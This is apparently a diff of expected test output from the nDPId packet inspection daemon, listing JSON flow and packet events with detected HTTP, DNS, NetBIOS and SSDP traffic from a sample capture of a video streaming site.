00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"}
00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1470104377820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377820,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUccAAAERU0fAqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1470104377839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104377839,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiQQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAGQ="}
00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1470104377839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104377839,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNAJhAgEGADFjB6UAAAAAwKgFCcCoBQnAqHcBAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"}
@@ -61,9 +61,9 @@
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1470104377901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="}
00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1470104377901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1470104378021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
@@ -92,57 +92,57 @@
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1470104378901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="}
00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1470104378905,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378905,"pkt":"ABxCjnAxTF4M6gNlCABFAABelWIAAPgRUBuoXwEBwKhzCAA1zfMASvjnceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAjMABN5J\/qfADAABAAEAAAIzAATeSf5x"}
00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"}
00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1470104378954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378954,"pkt":"ABxCjnAxTF4M6gNlCABFAABeST8AADAR\/Y8ICAgIwKhzCAA1zfMASpHwceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABN5J\/nHADAABAAEAAAJXAATeSf6n"}
00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}}
00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRMAAAQRv2DAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiAAAAERhWDAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"}
00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"}
00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1470104379066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="}
00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1470104379066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1470104379115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1470104379115,"pkt":"ABxCjnAxTF4M6gNlCABFAAB7GLEAAC4RMAEICAgIwKhzCAA17TQAZ+zhKZCBgAABAAQAAAAAA3BpYwUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABGq7I\/bADAABAAEAAAJXAASAx7rowAwAAQABAAACVwAEgMdvqcAMAAEAAQAAAlcABGq6Ezo="}
